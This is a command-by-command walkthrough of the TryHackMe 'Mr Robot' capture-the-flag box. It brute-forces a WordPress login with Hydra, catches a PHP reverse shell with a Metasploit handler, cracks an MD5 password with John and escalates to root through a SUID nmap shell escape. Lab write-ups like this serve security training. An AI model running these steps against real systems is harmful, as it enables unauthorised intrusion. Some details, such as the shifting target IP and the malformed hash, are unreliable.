TryHackMe Mr Robot CTF is based on the Mr. Robot show, can you root this box?

TryHackMe Mr Robot CTF Recon the B0x
nmap -Pn -sC -sV --script=vuln 10.10.171.61
Mr Robot CTF
./gobuster dir -u http://10.10.171.61 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 50 -q
wget http://10.10.171.61/robots.txt
User-agent: *
fsocity.dic
key-1-of-3.txt
wget http://10.10.171.61/key-1-of-3.txt
wget http://10.10.171.61/fsocity.dic
Brute Force WordPress Login
Detect Valid Username
hydra -L /home/kali/Desktop/TryHackMe_Labs/MrRobot_Lab/fsocity.dic -p rfs 10.10.131.16 http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^:F=Something is incorrect." -V -F -u
Detect Valid Password
hydra -l Elliot -P /home/kali/Desktop/TryHackMe_Labs/MrRobot_Lab/fsocity.dic 10.10.131.16 http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^:F=Something is incorrect." -V -F -u
Upload PHP reverse Shell
http://10.10.171.61/wp-login.php
metasploit listeningport 19850
msfconsole
use exploit/multi/handler
set LHOST tun0
set LPORT 19850
run
$ pwd
/home/robot
$ ls
key-2-of-3.txt
password.raw-md5
cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca-RFS
echo "c3fcd3d76192e4007dfb496cca-RFS" >> robot_passwd_md5.txt
john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt robot_passwd_md5.txt
python -c 'import pty; pty; pty.spawn("/bin/bash")'
[email protected]:/home/robot$ su - robot
Insert MD5 password cracked before
$ id
id
uid=1002(robot) gid=1002(robot) groups=1002(robot)
cat /home/robot/key-2-of-3.txt
Privilege Escalation
cat /etc/crontab
sudo -l
Find SUID Binaries
find / -perm +6000 2>/dev/null | grep '/bin/'
/usr/local/bin/nmap --interactive
!sh
cat /root/key-3-of-3.txt